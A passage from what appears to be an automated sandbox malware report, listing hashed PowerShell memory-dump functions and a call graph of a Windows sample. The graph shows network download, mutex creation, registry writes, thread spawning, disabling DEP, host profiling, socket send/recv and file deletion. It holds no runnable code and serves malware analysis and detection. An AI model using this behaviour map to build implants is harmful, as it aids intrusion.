                                                                                                        • Instruction Fuzzy Hash: 02E0D863E8E92E8EB3A1E35C644A5F863C4DF85221B4441BBF90EC3293DC059C1443C1
                                                                                                        Function 00007FFAAC489CA9 Relevance: .0, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9d56b0d6b2f0bc5ae004afb7e54e42237d703540f6a06a1a779223bc9591f62f
                                                                                                        • Instruction ID: f3cc901898e0e4371f20c8d10c513d7b529e24d81649af298737e10c4aa1420f
                                                                                                        • Opcode Fuzzy Hash: 9d56b0d6b2f0bc5ae004afb7e54e42237d703540f6a06a1a779223bc9591f62f
                                                                                                        • Instruction Fuzzy Hash: F1D06C35A4882DCF9F50EBD8E8092EDB7B0FB68312B000126D51AE7104D730A8158B94

                                                                                                        Non-executed Functions

                                                                                                        Function 00007FFAAC480FFA Relevance: .3, Instructions: 255COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 151c65379a7da47e5f8806735afe1417b7a1f17b173e4a4139ca9e2b672500fd
                                                                                                        • Instruction ID: 3277db0af03cfe865555358d64ddaf1a467ee5d57463b4b8e269105560c6ae8f
                                                                                                        • Opcode Fuzzy Hash: 151c65379a7da47e5f8806735afe1417b7a1f17b173e4a4139ca9e2b672500fd
                                                                                                        • Instruction Fuzzy Hash: FB81B197A0E7D28FE30397789CA94E53F60DF6321970941F7C5D5CB1A3E908590A83A2
                                                                                                        Function 00007FFAAC48D808 Relevance: .1, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dca48657d72e2c3f2b45962e538c8cb9ed5e06cfba41d233fca237560a7daae2
                                                                                                        • Instruction ID: 601ed2054f13bbff0332e36cf5a279cfdd67576768a40a506683d96922fcd7ed
                                                                                                        • Opcode Fuzzy Hash: dca48657d72e2c3f2b45962e538c8cb9ed5e06cfba41d233fca237560a7daae2
                                                                                                        • Instruction Fuzzy Hash: E921A12184F7C68FE7038B6088296F57FB09F43314F0981EBC0A98B0E3DA28965DC756
                                                                                                        Function 00007FFAAC48ACE5 Relevance: .0, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1518420921.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a6a934b8c44d489f62561837f3cb2067210387a60a9fd8b120e734395c580b36
                                                                                                        • Instruction ID: 7e19c7da5ecec2ef72d9434177e923287092f98d60d0fe4420869c92520417c6
                                                                                                        • Opcode Fuzzy Hash: a6a934b8c44d489f62561837f3cb2067210387a60a9fd8b120e734395c580b36
                                                                                                        • Instruction Fuzzy Hash: 0F01B13194E7898FF7269B20D814AF9B7B1EB43305F048276C41AE71D2DEACA609C785

                                                                                                        Executed Functions

                                                                                                        Function 00007FFAAC4937B5 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1379528053.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_7ffaac490000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4133b6f8fa03ccd1e611a3880bf14283cb80af7c12e0c68f5bafd5e35c8ebd46
                                                                                                        • Instruction ID: a63977d2a16e1b6b8195ff139319d3bc5a0349deb2a2279cdc4ff5a8510a676b
                                                                                                        • Opcode Fuzzy Hash: 4133b6f8fa03ccd1e611a3880bf14283cb80af7c12e0c68f5bafd5e35c8ebd46
                                                                                                        • Instruction Fuzzy Hash: 4A01677111CB0D8FD744EF0CE451AA6B7E0FB95364F10456DE58AC3661D636E882CB45
                                                                                                        Function 00007FFAAC560288 Relevance: .0, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1379907255.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_7ffaac560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 045437a61b409038a138b2d4fe64482846f5ac9cac967365160c121eb89617c1
                                                                                                        • Instruction ID: 141d31a3608b9f81e8fdf85111aa211253bd2b6d1c6f81bc3b8119fb7aa1bf96
                                                                                                        • Opcode Fuzzy Hash: 045437a61b409038a138b2d4fe64482846f5ac9cac967365160c121eb89617c1
                                                                                                        • Instruction Fuzzy Hash: FEE0D863E4EA2E4AB391F25CA4495F4A2C5DF85221B4841B7F94EC3192DC04DC1402C5

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:4.3%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:5.7%
                                                                                                        Total number of Nodes:1402
                                                                                                        Total number of Limit Nodes:65
                                                                                                        execution_graph 46482 41d4d0 46484 41d4e6 _Yarn ___scrt_fastfail 46482->46484 46483 41d6e3 46488 41d734 46483->46488 46498 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46483->46498 46484->46483 46486 431f99 21 API calls 46484->46486 46490 41d696 ___scrt_fastfail 46486->46490 46487 41d6f4 46487->46488 46489 41d760 46487->46489 46499 431f99 46487->46499 46489->46488 46507 41d474 21 API calls ___scrt_fastfail 46489->46507 46490->46488 46492 431f99 21 API calls 46490->46492 46496 41d6be ___scrt_fastfail 46492->46496 46494 41d72d ___scrt_fastfail 46494->46488 46504 43264f 46494->46504 46496->46488 46497 431f99 21 API calls 46496->46497 46497->46483 46498->46487 46500 431fa7 46499->46500 46502 431fa3 46499->46502 46508 43a88c 46500->46508 46502->46494 46517 43256f 46504->46517 46506 432657 46506->46489 46507->46488 46513 446aff _strftime 46508->46513 46509 446b3d 46516 445354 20 API calls _abort 46509->46516 46511 446b28 RtlAllocateHeap 46512 431fac 46511->46512 46511->46513 46512->46494 46513->46509 46513->46511 46515 442200 7 API calls 2 library calls 46513->46515 46515->46513 46516->46512 46518 43257e 46517->46518 46519 432588 46517->46519 46518->46506 46519->46518 46520 431f99 21 API calls 46519->46520 46521 4325a9 46520->46521 46521->46518 46523 43293a CryptAcquireContextA 46521->46523 46524 432956 46523->46524 46525 43295b CryptGenRandom 46523->46525 46524->46518 46525->46524 46526 432970 CryptReleaseContext 46525->46526 46526->46524 46527 426030 46532 4260f7 recv 46527->46532 46533 426091 46538 42610e send 46533->46538 46539 425e56 46540 425e6b 46539->46540 46543 425f0b 46539->46543 46541 425f25 46540->46541 46542 425f5a 46540->46542 46540->46543 46544 425eb9 46540->46544 46545 425f77 46540->46545 46546 425f9e 46540->46546 46553 425eee 46540->46553 46567 424354 46540->46567 46541->46542 46541->46543 46576 41f075 54 API calls 46541->46576 46542->46545 46577 424b7b 21 API calls 46542->46577 46544->46543 46544->46553 46575 41f075 54 API calls 46544->46575 46545->46543 46545->46546 46555 424f78 46545->46555 46546->46543 46578 4255c7 28 API calls 46546->46578 46553->46541 46553->46543 46554 424354 50 API calls 46553->46554 46554->46541 46557 424f97 ___scrt_fastfail 46555->46557 46556 424fab 46562 424fb4 46556->46562 46564 424fcb 46556->46564 46581 41cf6e 50 API calls 46556->46581 46559 424fa6 46557->46559 46557->46564 46579 41e097 21 API calls 46557->46579 46559->46556 46559->46564 46580 41fad4 47 API calls 46559->46580 46562->46564 46582 424185 21 API calls 2 library calls 46562->46582 46564->46546 46565 42504e 46565->46564 46566 431f99 21 API calls 46565->46566 46566->46556 46568 42436d 46567->46568 46574 424362 _Yarn 46567->46574 46583 422d43 46568->46583 46570 424399 46570->46574 46597 41e097 21 API calls 46570->46597 46572 4243bf 46572->46574 46598 43265b CryptAcquireContextA CryptGenRandom CryptReleaseContext 46572->46598 46574->46544 46575->46544 46576->46541 46577->46545 46578->46543 46579->46559 46580->46565 46581->46562 46582->46564 46584 422d58 46583->46584 46589 422d82 46583->46589 46584->46589 46617 422c5d 21 API calls 46584->46617 46585 422dd5 46588 422e4e 46585->46588 46599 421d0b 46585->46599 46588->46570 46589->46585 46589->46588 46618 42172d 21 API calls 46589->46618 46591 422deb 46591->46588 46604 4219ef 46591->46604 46593 422e10 46593->46588 46595 422e2c 46593->46595 46619 421ddf 21 API calls 46593->46619 46595->46588 46609 4227b1 46595->46609 46597->46572 46598->46574 46600 421d15 46599->46600 46601 421d0f 46599->46601 46620 421353 21 API calls 46600->46620 46601->46591 46603 421d1f 46603->46591 46605 4219f3 46604->46605 46606 421a04 46604->46606 46605->46606 46621 421353 21 API calls 46605->46621 46606->46593 46608 421a01 46608->46593 46610 4227ce 46609->46610 46612 4227db 46610->46612 46622 421353 21 API calls 46610->46622 46613 42282c 46612->46613 46615 4227f3 46612->46615 46623 42276e 21 API calls ___scrt_fastfail 46612->46623 46613->46615 46624 422036 50 API calls 46613->46624 46615->46588 46617->46589 46618->46585 46619->46595 46620->46603 46621->46608 46622->46612 46623->46613 46624->46615 46625 43a998 46628 43a9a4 _swprintf ___scrt_is_nonwritable_in_current_image 46625->46628 46626 43a9b2 46643 445354 20 API calls _abort 46626->46643 46628->46626 46631 43a9dc 46628->46631 46629 43a9b7 46644 43a827 26 API calls _Deallocate 46629->46644 46638 444acc EnterCriticalSection 46631->46638 46633 43a9e7 46639 43aa88 46633->46639 46635 43a9c2 std::_Locinfo::_Locinfo_dtor 46638->46633 46640 43aa96 46639->46640 46642 43a9f2 46640->46642 46646 448416 39 API calls 2 library calls 46640->46646 46645 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 46642->46645 46643->46629 46644->46635 46645->46635 46646->46640 46647 414dba 46662 41a51b 46647->46662 46649 414dc3 46672 401fbd 46649->46672 46653 414dde 46654 4161f2 46653->46654 46677 401eea 46653->46677 46681 401d8c 46654->46681 46657 4161fb 46658 401eea 26 API calls 46657->46658 46659 416207 46658->46659 46660 401eea 26 API calls 46659->46660 46661 416213 46660->46661 46663 41a529 46662->46663 46664 43a88c _Yarn 21 API calls 46663->46664 46665 41a533 InternetOpenW InternetOpenUrlW 46664->46665 46666 41a55c InternetReadFile 46665->46666 46667 41a57f 46666->46667 46667->46666 46668 41a5ac InternetCloseHandle InternetCloseHandle 46667->46668 46671 401eea 26 API calls 46667->46671 46687 401f86 46667->46687 46670 41a5be 46668->46670 46670->46649 46671->46667 46673 401fcc 46672->46673 46696 402501 46673->46696 46675 401fea 46676 404468 60 API calls _Yarn 46675->46676 46676->46653 46679 4021b9 46677->46679 46678 4021e8 46678->46654 46679->46678 46701 40262e 26 API calls _Deallocate 46679->46701 46682 40200a 46681->46682 46686 40203a 46682->46686 46702 402654 26 API calls 46682->46702 46684 40202b 46703 4026ba 26 API calls _Deallocate 46684->46703 46686->46657 46688 401f8e 46687->46688 46691 402325 46688->46691 46690 401fa4 46690->46667 46692 40232f 46691->46692 46694 40233a 46692->46694 46695 40294a 28 API calls 46692->46695 46694->46690 46695->46694 46697 40250d 46696->46697 46699 40252b 46697->46699 46700 40261a 28 API calls 46697->46700 46699->46675 46700->46699 46701->46678 46702->46684 46703->46686 46704 402bcc 46705 402bd7 46704->46705 46707 402bdf 46704->46707 46722 403315 28 API calls _Deallocate 46705->46722 46708 402beb 46707->46708 46712 4015d3 46707->46712 46709 402bdd 46714 43360d 46712->46714 46713 43a88c _Yarn 21 API calls 46713->46714 46714->46713 46715 402be9 46714->46715 46718 43362e std::_Facet_Register 46714->46718 46723 442200 7 API calls 2 library calls 46714->46723 46717 433dec std::_Facet_Register 46725 437bd7 RaiseException 46717->46725 46718->46717 46724 437bd7 RaiseException 46718->46724 46721 433e09 46722->46709 46723->46714 46724->46717 46725->46721 46726 4339be 46727 4339ca ___scrt_is_nonwritable_in_current_image 46726->46727 46758 4336b3 46727->46758 46729 4339d1 46730 433b24 46729->46730 46733 4339fb 46729->46733 47058 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46730->47058 46732 433b2b 47059 4426be 28 API calls _abort 46732->47059 46743 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46733->46743 47052 4434d1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46733->47052 46735 433b31 47060 442670 28 API calls _abort 46735->47060 46738 433a14 46740 433a1a 46738->46740 47053 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46738->47053 46739 433b39 46742 433a9b 46769 433c5e 46742->46769 46743->46742 47054 43edf4 38 API calls 2 library calls 46743->47054 46752 433abd 46752->46732 46753 433ac1 46752->46753 46754 433aca 46753->46754 47056 442661 28 API calls _abort 46753->47056 47057 433842 13 API calls 2 library calls 46754->47057 46757 433ad2 46757->46740 46759 4336bc 46758->46759 47061 433e0a IsProcessorFeaturePresent 46759->47061 46761 4336c8 47062 4379ee 10 API calls 3 library calls 46761->47062 46763 4336cd 46764 4336d1 46763->46764 47063 44335e 46763->47063 46764->46729 46767 4336e8 46767->46729 47138 436050 46769->47138 46772 433aa1 46773 443422 46772->46773 47140 44ddc9 46773->47140 46775 44342b 46776 433aaa 46775->46776 47144 44e0d3 38 API calls 46775->47144 46778 40d767 46776->46778 47146 41bce3 LoadLibraryA GetProcAddress 46778->47146 46780 40d783 GetModuleFileNameW 47151 40e168 46780->47151 46782 40d79f 46783 401fbd 28 API calls 46782->46783 46784 40d7ae 46783->46784 46785 401fbd 28 API calls 46784->46785 46786 40d7bd 46785->46786 47166 41afc3 46786->47166 46790 40d7cf 46791 401d8c 26 API calls 46790->46791 46792 40d7d8 46791->46792 46793 40d835 46792->46793 46794 40d7eb 46792->46794 47191 401d64 46793->47191 47445 40e986 111 API calls 46794->47445 46797 40d845 46800 401d64 28 API calls 46797->46800 46798 40d7fd 46799 401d64 28 API calls 46798->46799 46803 40d809 46799->46803 46801 40d864 46800->46801 47196 404cbf 46801->47196 47446 40e937 68 API calls 46803->47446 46804 40d873 47200 405ce6 46804->47200 46807 40d87f 47203 401eef 46807->47203 46808 40d824 47447 40e155 68 API calls 46808->47447 46811 40d88b 46812 401eea 26 API calls 46811->46812 46813 40d894 46812->46813 46815 401eea 26 API calls 46813->46815 46814 401eea 26 API calls 46816 40dc9f 46814->46816 46817 40d89d 46815->46817 47055 433c94 GetModuleHandleW 46816->47055 46818 401d64 28 API calls 46817->46818 46819 40d8a6 46818->46819 47207 401ebd 46819->47207 46821 40d8b1 46822 401d64 28 API calls 46821->46822 46823 40d8ca 46822->46823 46824 401d64 28 API calls 46823->46824 46826 40d8e5 46824->46826 46825 40d946 46828 401d64 28 API calls 46825->46828 46843 40e134 46825->46843 46826->46825 47448 4085b4 46826->47448 46833 40d95d 46828->46833 46829 40d912 46830 401eef 26 API calls 46829->46830 46831 40d91e 46830->46831 46834 401eea 26 API calls 46831->46834 46832 40d9a4 47211 40bed7 46832->47211 46833->46832 46838 4124b7 3 API calls 46833->46838 46835 40d927 46834->46835 47452 4124b7 RegOpenKeyExA 46835->47452 46837 40d9aa 46839 40d82d 46837->46839 47214 41a463 46837->47214 46844 40d988 46838->46844 46839->46814 46842 40d9c5 46845 40da18 46842->46845 47231 40697b 46842->47231 47530 412902 30 API calls 46843->47530 46844->46832 47455 412902 30 API calls 46844->47455 46847 401d64 28 API calls 46845->46847 46850 40da21 46847->46850 46859 40da32 46850->46859 46860 40da2d 46850->46860 46852 40e14a 47531 4112b5 64 API calls ___scrt_fastfail 46852->47531 46853 40d9e4 47456 40699d 30 API calls 46853->47456 46854 40d9ee 46856 401d64 28 API calls 46854->46856 46867 40d9f7 46856->46867 46862 401d64 28 API calls 46859->46862 47459 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46860->47459 46861 40d9e9 47457 4064d0 97 API calls 46861->47457 46865 40da3b 46862->46865 47235 41ae08 46865->47235 46867->46845 46870 40da13 46867->46870 46868 40da46 47239 401e18 46868->47239 47458 4064d0 97 API calls 46870->47458 46871 40da51 47243 401e13 46871->47243 46874 40da5a 46875 401d64 28 API calls 46874->46875 46876 40da63 46875->46876 46877 401d64 28 API calls 46876->46877 46878 40da7d 46877->46878 46879 401d64 28 API calls 46878->46879 46880 40da97 46879->46880 46881 401d64 28 API calls 46880->46881 46883 40dab0 46881->46883 46882 40db1d 46884 40db2c 46882->46884 46891 40dcaa ___scrt_fastfail 46882->46891 46883->46882 46885 401d64 28 API calls 46883->46885 46886 40db35 46884->46886 46914 40dbb1 ___scrt_fastfail 46884->46914 46889 40dac5 _wcslen 46885->46889 46887 401d64 28 API calls 46886->46887 46888 40db3e 46887->46888 46890 401d64 28 API calls 46888->46890 46889->46882 46892 401d64 28 API calls 46889->46892 46893 40db50 46890->46893 47519 41265d RegOpenKeyExA 46891->47519 46894 40dae0 46892->46894 46896 401d64 28 API calls 46893->46896 46897 401d64 28 API calls 46894->46897 46898 40db62 46896->46898 46899 40daf5 46897->46899 46902 401d64 28 API calls 46898->46902 47460 40c89e 46899->47460 46900 40dcef 46901 401d64 28 API calls 46900->46901 46903 40dd16 46901->46903 46905 40db8b 46902->46905 47257 401f66 46903->47257 46908 401d64 28 API calls 46905->46908 46907 401e18 26 API calls 46910 40db14 46907->46910 46911 40db9c 46908->46911 46913 401e13 26 API calls 46910->46913 47517 40bc67 45 API calls _wcslen 46911->47517 46912 40dd25 47261 4126d2 RegCreateKeyA 46912->47261 46913->46882 47247 4128a2 46914->47247 46918 40dc45 ctype 46923 401d64 28 API calls 46918->46923 46919 40dbac 46919->46914 46921 401d64 28 API calls 46922 40dd47 46921->46922 47267 43a5e7 46922->47267 46924 40dc5c 46923->46924 46924->46900 46927 40dc70 46924->46927 46930 401d64 28 API calls 46927->46930 46928 40dd5e 47522 41beb0 86 API calls ___scrt_fastfail 46928->47522 46929 40dd81 46934 401f66 28 API calls 46929->46934 46932 40dc7e 46930->46932 46935 41ae08 28 API calls 46932->46935 46933 40dd65 CreateThread 46933->46929 48244 41c96f 10 API calls 46933->48244 46936 40dd96 46934->46936 46937 40dc87 46935->46937 46938 401f66 28 API calls 46936->46938 47518 40e219 109 API calls 46937->47518 46940 40dda5 46938->46940 47271 41a686 46940->47271 46941 40dc8c 46941->46900 46943 40dc93 46941->46943 46943->46839 46945 401d64 28 API calls 46946 40ddb6 46945->46946 46947 401d64 28 API calls 46946->46947 46948 40ddcb 46947->46948 46949 401d64 28 API calls 46948->46949 46950 40ddeb 46949->46950 46951 43a5e7 _strftime 42 API calls 46950->46951 46952 40ddf8 46951->46952 46953 401d64 28 API calls 46952->46953 46954 40de03 46953->46954 46955 401d64 28 API calls 46954->46955 46956 40de14 46955->46956 46957 401d64 28 API calls 46956->46957 46958 40de29 46957->46958 46959 401d64 28 API calls 46958->46959 46960 40de3a 46959->46960 46961 40de41 StrToIntA 46960->46961 47295 409517 46961->47295 46964 401d64 28 API calls 46965 40de5c 46964->46965 46966 40dea1 46965->46966 46967 40de68 46965->46967 46970 401d64 28 API calls 46966->46970 47523 43360d 22 API calls 3 library calls 46967->47523 46969 40de71 46971 401d64 28 API calls 46969->46971 46972 40deb1 46970->46972 46973 40de84 46971->46973 46974 40def9 46972->46974 46975 40debd 46972->46975 46976 40de8b CreateThread 46973->46976 46978 401d64 28 API calls 46974->46978 47524 43360d 22 API calls 3 library calls 46975->47524 46976->46966 48242 419128 102 API calls 2 library calls 46976->48242 46980 40df02 46978->46980 46979 40dec6 46981 401d64 28 API calls 46979->46981 46983 40df6c 46980->46983 46984 40df0e 46980->46984 46982 40ded8 46981->46982 46985 40dedf CreateThread 46982->46985 46986 401d64 28 API calls 46983->46986 46987 401d64 28 API calls 46984->46987 46985->46974 48247 419128 102 API calls 2 library calls 46985->48247 46988 40df75 46986->46988 46989 40df1e 46987->46989 46990 40df81 46988->46990 46991 40dfba 46988->46991 46992 401d64 28 API calls 46989->46992 46993 401d64 28 API calls 46990->46993 47320 41a7a2 GetComputerNameExW GetUserNameW 46991->47320 46994 40df33 46992->46994 46996 40df8a 46993->46996 47525 40c854 31 API calls 46994->47525 47002 401d64 28 API calls 46996->47002 46998 401e18 26 API calls 46999 40dfce 46998->46999 47001 401e13 26 API calls 46999->47001 47004 40dfd7 47001->47004 47005 40df9f 47002->47005 47003 40df46 47006 401e18 26 API calls 47003->47006 47007 40dfe0 SetProcessDEPPolicy 47004->47007 47008 40dfe3 CreateThread 47004->47008 47015 43a5e7 _strftime 42 API calls 47005->47015 47009 40df52 47006->47009 47007->47008 47010 40e004 47008->47010 47011 40dff8 CreateThread 47008->47011 48215 40e54f 47008->48215 47012 401e13 26 API calls 47009->47012 47013 40e019 47010->47013 47014 40e00d CreateThread 47010->47014 47011->47010 48243 410f36 137 API calls 47011->48243 47016 40df5b CreateThread 47012->47016 47018 40e073 47013->47018 47020 401f66 28 API calls 47013->47020 47014->47013 48245 411524 38 API calls ___scrt_fastfail 47014->48245 47017 40dfac 47015->47017 47016->46983 48246 40196b 49 API calls _strftime 47016->48246 47526 40b95c 7 API calls 47017->47526 47331 41246e RegOpenKeyExA 47018->47331 47021 40e046 47020->47021 47527 404c9e 28 API calls 47021->47527 47024 40e053 47026 401f66 28 API calls 47024->47026 47028 40e062 47026->47028 47027 40e12a 47343 40cbac 47027->47343 47031 41a686 79 API calls 47028->47031 47030 41ae08 28 API calls 47033 40e0a4 47030->47033 47034 40e067 47031->47034 47334 412584 RegOpenKeyExW 47033->47334 47036 401eea 26 API calls 47034->47036 47036->47018 47039 401e13 26 API calls 47042 40e0c5 47039->47042 47040 40e0ed DeleteFileW 47041 40e0f4 47040->47041 47040->47042 47044 41ae08 28 API calls 47041->47044 47042->47040 47042->47041 47043 40e0db Sleep 47042->47043 47528 401e07 47043->47528 47046 40e104 47044->47046 47339 41297a RegOpenKeyExW 47046->47339 47048 40e117 47049 401e13 26 API calls 47048->47049 47050 40e121 47049->47050 47051 401e13 26 API calls 47050->47051 47051->47027 47052->46738 47053->46743 47054->46742 47055->46752 47056->46754 47057->46757 47058->46732 47059->46735 47060->46739 47061->46761 47062->46763 47067 44e949 47063->47067 47066 437a17 8 API calls 3 library calls 47066->46764 47070 44e966 47067->47070 47071 44e962 47067->47071 47069 4336da 47069->46767 47069->47066 47070->47071 47073 4489ad 47070->47073 47085 433d2c 47071->47085 47074 4489b9 ___scrt_is_nonwritable_in_current_image 47073->47074 47092 444acc EnterCriticalSection 47074->47092 47076 4489c0 47093 44ef64 47076->47093 47078 4489cf 47084 4489de 47078->47084 47106 448841 29 API calls 47078->47106 47081 4489d9 47107 4488f7 GetStdHandle GetFileType 47081->47107 47083 4489ef std::_Locinfo::_Locinfo_dtor 47083->47070 47108 4489fa LeaveCriticalSection std::_Lockit::~_Lockit 47084->47108 47086 433d37 IsProcessorFeaturePresent 47085->47086 47087 433d35 47085->47087 47089 4341a4 47086->47089 47087->47069 47137 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47089->47137 47091 434287 47091->47069 47092->47076 47094 44ef70 ___scrt_is_nonwritable_in_current_image 47093->47094 47095 44ef94 47094->47095 47096 44ef7d 47094->47096 47109 444acc EnterCriticalSection 47095->47109 47117 445354 20 API calls _abort 47096->47117 47099 44ef82 47118 43a827 26 API calls _Deallocate 47099->47118 47101 44efcc 47119 44eff3 LeaveCriticalSection std::_Lockit::~_Lockit 47101->47119 47102 44ef8c std::_Locinfo::_Locinfo_dtor 47102->47078 47103 44efa0 47103->47101 47110 44eeb5 47103->47110 47106->47081 47107->47084 47108->47083 47109->47103 47120 448706 47110->47120 47112 44eed4 47127 446ac5 47112->47127 47114 44eec7 47114->47112 47133 44772e 11 API calls 2 library calls 47114->47133 47115 44ef26 47115->47103 47117->47099 47118->47102 47119->47102 47126 448713 _strftime 47120->47126 47121 448753 47135 445354 20 API calls _abort 47121->47135 47122 44873e RtlAllocateHeap 47124 448751 47122->47124 47122->47126 47124->47114 47126->47121 47126->47122 47134 442200 7 API calls 2 library calls 47126->47134 47128 446ad0 RtlFreeHeap 47127->47128 47132 446af9 __dosmaperr 47127->47132 47129 446ae5 47128->47129 47128->47132 47136 445354 20 API calls _abort 47129->47136 47131 446aeb GetLastError 47131->47132 47132->47115 47133->47114 47134->47126 47135->47124 47136->47131 47137->47091 47139 433c71 GetStartupInfoW 47138->47139 47139->46772 47141 44dddb 47140->47141 47142 44ddd2 47140->47142 47141->46775 47145 44dcc8 51 API calls 5 library calls 47142->47145 47144->46775 47145->47141 47147 41bd22 LoadLibraryA GetProcAddress 47146->47147 47148 41bd12 GetModuleHandleA GetProcAddress 47146->47148 47149 41bd4b 32 API calls 47147->47149 47150 41bd3b LoadLibraryA GetProcAddress 47147->47150 47148->47147 47149->46780 47150->47149 47532 41a63f FindResourceA 47151->47532 47154 43a88c _Yarn 21 API calls 47155 40e192 _Yarn 47154->47155 47156 401f86 28 API calls 47155->47156 47157 40e1ad 47156->47157 47158 401eef 26 API calls 47157->47158 47159 40e1b8 47158->47159 47160 401eea 26 API calls 47159->47160 47161 40e1c1 47160->47161 47162 43a88c _Yarn 21 API calls 47161->47162 47163 40e1d2 _Yarn 47162->47163 47535 406052 47163->47535 47165 40e205 47165->46782 47186 41afd6 47166->47186 47167 41b046 47168 401eea 26 API calls 47167->47168 47169 41b078 47168->47169 47170 401eea 26 API calls 47169->47170 47172 41b080 47170->47172 47171 41b048 47173 403b60 28 API calls 47171->47173 47175 401eea 26 API calls 47172->47175 47176 41b054 47173->47176 47177 40d7c6 47175->47177 47178 401eef 26 API calls 47176->47178 47187 40e8bd 47177->47187 47180 41b05d 47178->47180 47179 401eef 26 API calls 47179->47186 47181 401eea 26 API calls 47180->47181 47183 41b065 47181->47183 47182 401eea 26 API calls 47182->47186 47184 41bfa9 28 API calls 47183->47184 47184->47167 47186->47167 47186->47171 47186->47179 47186->47182 47538 403b60 47186->47538 47541 41bfa9 47186->47541 47188 40e8ca 47187->47188 47190 40e8da 47188->47190 47591 40200a 26 API calls 47188->47591 47190->46790 47192 401d6c 47191->47192 47194 401d74 47192->47194 47592 401fff 28 API calls 47192->47592 47194->46797 47197 404ccb 47196->47197 47593 402e78 47197->47593 47199 404cee 47199->46804 47602 404bc4 47200->47602 47202 405cf4 47202->46807 47204 401efe 47203->47204 47206 401f0a 47204->47206 47611 4021b9 26 API calls 47204->47611 47206->46811 47209 401ec9 47207->47209 47208 401ee4 47208->46821 47209->47208 47210 402325 28 API calls 47209->47210 47210->47208 47612 401e8f 47211->47612 47213 40bee1 CreateMutexA GetLastError 47213->46837 47614 41b15b 47214->47614 47219 401eef 26 API calls 47220 41a49f 47219->47220 47221 401eea 26 API calls 47220->47221 47222 41a4a7 47221->47222 47223 41a4fa 47222->47223 47224 412513 31 API calls 47222->47224 47223->46842 47225 41a4cd 47224->47225 47226 41a4d8 StrToIntA 47225->47226 47227 41a4ef 47226->47227 47228 41a4e6 47226->47228 47229 401eea 26 API calls 47227->47229 47622 41c102 28 API calls 47228->47622 47229->47223 47232 40698f 47231->47232 47233 4124b7 3 API calls 47232->47233 47234 406996 47233->47234 47234->46853 47234->46854 47236 41ae1c 47235->47236 47623 40b027 47236->47623 47238 41ae24 47238->46868 47240 401e27 47239->47240 47242 401e33 47240->47242 47632 402121 26 API calls 47240->47632 47242->46871 47244 402121 47243->47244 47245 402150 47244->47245 47633 402718 26 API calls _Deallocate 47244->47633 47245->46874 47248 4128c0 47247->47248 47249 406052 28 API calls 47248->47249 47250 4128d5 47249->47250 47251 401fbd 28 API calls 47250->47251 47252 4128e5 47251->47252 47253 4126d2 29 API calls 47252->47253 47254 4128ef 47253->47254 47255 401eea 26 API calls 47254->47255 47256 4128fc 47255->47256 47256->46918 47258 401f6e 47257->47258 47634 402301 47258->47634 47262 412722 47261->47262 47263 4126eb 47261->47263 47264 401eea 26 API calls 47262->47264 47266 4126fd RegSetValueExA RegCloseKey 47263->47266 47265 40dd3b 47264->47265 47265->46921 47266->47262 47268 43a600 _strftime 47267->47268 